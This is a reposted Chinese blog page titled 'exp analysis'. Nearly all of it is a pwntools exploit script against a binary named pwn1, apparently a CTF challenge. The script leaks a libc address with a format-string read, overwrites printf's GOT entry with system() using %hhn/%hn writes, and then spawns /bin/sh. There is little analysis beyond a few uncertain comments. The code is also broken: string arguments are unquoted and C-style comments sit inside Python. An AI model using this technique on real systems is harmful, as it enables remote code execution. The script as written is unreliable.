码迷,mamicode.com
首页 > 其他好文 > 详细

exp分析

时间:2017-12-13 00:02:05      阅读:233      评论:0      收藏:0      [点我收藏+]

标签:else   gpo   please   recv   tar   tac   put   line   127.0.0.1   

1 from pwn import*
 2 
 3 local =1
 4 debug = 1
 5 
 6 if local:
 7     p = process(./pwn1)
 8 else:
 9     p = remote("127.0.0.1",8080)
10 
11 #context.log_level = ‘debug‘
12 ‘‘‘
13 if debug:
14     gdb.attach(p)
15 ‘‘‘
16 def fms(data):
17     p.recvuntil("input$",timeout=4)
18     p.sendline("1")
19     p.recvuntil("please input your name:\n")
20     p.sendline(data)
21 
22 
23 libc = ELF("/lib/i386-linux-gnu/libc.so.6")
24 elf = ELF(./pwn1)
25 
26 fms(%35$p)
27 
28 libc_start_main_addr = int(p.recv(10),16) - 243    #__libc_start_main//?
29 libc_addr = libc_start_main_addr - libc.symbols[__libc_start_main]//?
30 print "libc_addr =",hex(libc_addr)
31 
32 printf_got = elf.got[printf]//got表地址
33 print "printf_got =",hex(printf_got)
34 
35 system_addr =libc_addr + libc.symbols[system]//symbols[‘system‘]函数地址
36 print "system_addr =",hex(system_addr)
37 //ELF模块
38 #make stack
39 make_stack = a * 0x30 + p32(printf_got) + p32(printf_got + 0x1) 
40 fms(make_stack)
41 #gdb.attach(p)
42 
43 payload = "%" + str(((system_addr & 0x000000FF))) + "x%18$hhn"
44 payload += "%" + str(((system_addr & 0x00FFFF00) >> 8) - (system_addr & 0x000000FF)) + "x%19$hn" 
45 print "payload=",payload
46 
47 fms(payload)
48 fms(/bin/sh\x00)
49 p.interactive()

 

exp分析

标签:else   gpo   please   recv   tar   tac   put   line   127.0.0.1   

原文地址:http://www.cnblogs.com/liuyimin/p/8029855.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!